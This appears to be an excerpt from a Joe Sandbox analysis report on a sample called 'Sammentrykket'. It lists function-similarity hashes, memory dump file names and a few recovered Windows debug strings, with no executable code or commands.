                • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eca44219a8a5bf41f5feb22c3a59438e16698c14a01ce73ebe1ab8baea63e5f9
                • Instruction ID: 039434d047d9cccc4a013b5d24f98b53517d8ef44caf5a9303355c8529e1664f
                • Opcode Fuzzy Hash: eca44219a8a5bf41f5feb22c3a59438e16698c14a01ce73ebe1ab8baea63e5f9
                • Instruction Fuzzy Hash: 03118C78E10259EFCB04DFE8D445A9EB7B4EF18704F14809AB915EB381E734DA02CBA4
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                • Instruction ID: 9f3e7ebc9ad8059ae4f1adddf60f3e19953eeb423be4ab58e107c2270817daf0
                • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                • Instruction Fuzzy Hash: 7DF046B334153A9BE33206D94841F1BE6A9DFD5A60F220476B117BB740CA78CC82F6E4
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e2ae955e396d44ec965573801caf8f61c4f9232b56adddc1d6aaba6bfdac2a11
                • Instruction ID: 6efc65121224960e03afd5f19599f75f0cbe6171a0c44e048bf868d4a4786de7
                • Opcode Fuzzy Hash: e2ae955e396d44ec965573801caf8f61c4f9232b56adddc1d6aaba6bfdac2a11
                • Instruction Fuzzy Hash: 89110C70A006499FDB04DFA9D445B9DF7F4BB08304F1441AAE515EB381D638D941CB50
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5945f24ac922c433c9bff86e2cb8d84a42ed0551ca5f9de70dbe3d5124a37423
                • Instruction ID: 6c241c0fcf58412dfe44e9e1accfdab8f3888b74050d97e3c1fa28852867543f
                • Opcode Fuzzy Hash: 5945f24ac922c433c9bff86e2cb8d84a42ed0551ca5f9de70dbe3d5124a37423
                • Instruction Fuzzy Hash: D3F0F0B3744249DBE714C6DA8C45F23B39AE788711F7180AAFA068B291EA729C81D255
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                • Instruction ID: afee7108ee6e2e58a10c0c6682caa09d461a98b17979d7c0f25203f00c268094
                • Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
                • Instruction Fuzzy Hash: F1F04F72900608BFE711DBA4CC42FDAB7FCEB04714F104566BA56D7180EAB4EA40CB90
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b15566249ea261f7f4142b86957544f0ff3229e9710390427e1e13de134018ef
                • Instruction ID: afd127febba32efe120f8e98b3544e6594a5d997eb6089d5edc86c37c0abb749
                • Opcode Fuzzy Hash: b15566249ea261f7f4142b86957544f0ff3229e9710390427e1e13de134018ef
                • Instruction Fuzzy Hash: F9F04F74A04208AFCB04DFF8D945B9EB7F4EF18304F508459B956EB380E678EA00CB54
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eab11dafd0013fab6bb0f54cd233f8fbdaf8c16f9d573b09bfa41f6d28778718
                • Instruction ID: 2a10cf9c66b0dc18831642d2b5a73d77dca0a5c42efb3f1112d08b2eaa0fc317
                • Opcode Fuzzy Hash: eab11dafd0013fab6bb0f54cd233f8fbdaf8c16f9d573b09bfa41f6d28778718
                • Instruction Fuzzy Hash: E7F08C71A51648ABCB04DBE8C86BF9EB7B8AF08704F504098F612EB380D978D901CB18
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 11d0f9c1e1f4aa8f6b2eb34349d107d1dd0f55ec89e95ba20f8fbf1d1c2706fb
                • Instruction ID: 666bdd76dd211b342654f34ed8eb9757d174268ca1f0becc5ddc00a1f4f384ea
                • Opcode Fuzzy Hash: 11d0f9c1e1f4aa8f6b2eb34349d107d1dd0f55ec89e95ba20f8fbf1d1c2706fb
                • Instruction Fuzzy Hash: 90F08270A00248ABDB04DBF8D556F5EB7B8AF09704F544498B602EB384EA78D9008754
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 54ae5208817f0e7f9b98d9e399f00fe3bfb11818fedb153f83094fb8b1625ef7
                • Instruction ID: eb0f7334706bf8349978cc502fce47535ba17dfa72c1d04a40421dadeaf42df0
                • Opcode Fuzzy Hash: 54ae5208817f0e7f9b98d9e399f00fe3bfb11818fedb153f83094fb8b1625ef7
                • Instruction Fuzzy Hash: 08F082319156589FDB12D7F5C246F02B7DCAB46770F1981A1E41B8BA12D764DE40C690
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                • Instruction ID: 723e798f670b465ce46e3d2a13e45df6efd6b22b50b8fb4cbb585bce476c0427
                • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                • Instruction Fuzzy Hash: 94E08C32145918EEE7311BE0DC01F42B6B9AF40710F2044AAF087068A08ABDACC2EA48
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                • Instruction ID: d472acdc59d55bf9b6bde9a3643ff5c7ed3ec919875c95db5988b66360e25e8b
                • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                • Instruction Fuzzy Hash: 77D0123630607497CB2957D56954F67FA199B86A50F16006D790B93900C5188C82D6F0
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                • Instruction ID: 99b6baec0b4b0ce8071e19a827d1cf967cb1d2d06f61f0475ef6624c80766fed
                • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                • Instruction Fuzzy Hash: 9AD0E935352D80DFD65ACB5DC9A4B1573A8BB45B84F8144D0E902CB762D66CDE44CA04
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                • Instruction ID: c897075a3d6b8a3b2ec0733abec7da01cc60720e6454720ad8489404784d022d
                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                • Instruction Fuzzy Hash: 64D0123610024CEFCB05DF80C854E5A772AFFD8710F108019FD1A076508A71ED62DA50

                Control-flow Graph

                Similarity
                • API ID: DebugPrintTimes
                • String ID: HEAP:
                • API String ID: 3446177414-2466845122
                • Opcode ID: 23f5e022e6eab0a22bfe8a13f5278187725a1883dcaff6f4ef339fef5a34abb1
                • Instruction ID: 6584e3727ea369e9ce4c602cc9b2da70189435da39c40b2f4c7134a8b05d2f79
                • Opcode Fuzzy Hash: 23f5e022e6eab0a22bfe8a13f5278187725a1883dcaff6f4ef339fef5a34abb1
                • Instruction Fuzzy Hash: FAA1AAB161831A8FC705CFA8C898A1AB7E5BF88310F14456DEA46DB371E7B4EC41CB91

                Control-flow Graph

                Strings
                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 20987807
                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 209878F3
                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 209877E2
                • Actx , xrefs: 20987819, 20987880
                • RtlpFindActivationContextSection_CheckParameters, xrefs: 209877DD, 20987802
                • SsHd, xrefs: 2093A304
                Similarity
                • API ID:
                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                • API String ID: 0-1988757188
                • Opcode ID: 05ce1cbc84595e26968b42de51c52483c1e6fe1403d7f1f71703520870173929
                • Instruction ID: 57bd934b4d672958a0a83559123b70c89620c41db76b7f27646c96ee36bfc56b
                • Opcode Fuzzy Hash: 05ce1cbc84595e26968b42de51c52483c1e6fe1403d7f1f71703520870173929
                • Instruction Fuzzy Hash: F6E1CE316083028FD715CFA4C888B1AB7E9BB84364F100A6DF966CB291D73ADD45CF82

                Control-flow Graph

                Similarity
                • API ID: DebugPrintTimes
                • String ID: $$@$@wku
                • API String ID: 3446177414-1949908181
                • Opcode ID: a9c2e59eda6e7da3efc7cb45b08d3079a0e7b18e978f765b2fc26e80dc95ec47
                • Instruction ID: 72c430d51ad2773398736729f008398ff5c4499ee9c19ba41e029f6de3548924
                • Opcode Fuzzy Hash: a9c2e59eda6e7da3efc7cb45b08d3079a0e7b18e978f765b2fc26e80dc95ec47
                • Instruction Fuzzy Hash: 15814A71D016699FDB21CF94CC41BDEB7B8AF48710F0041EAAA0AB7250E7349E85CFA1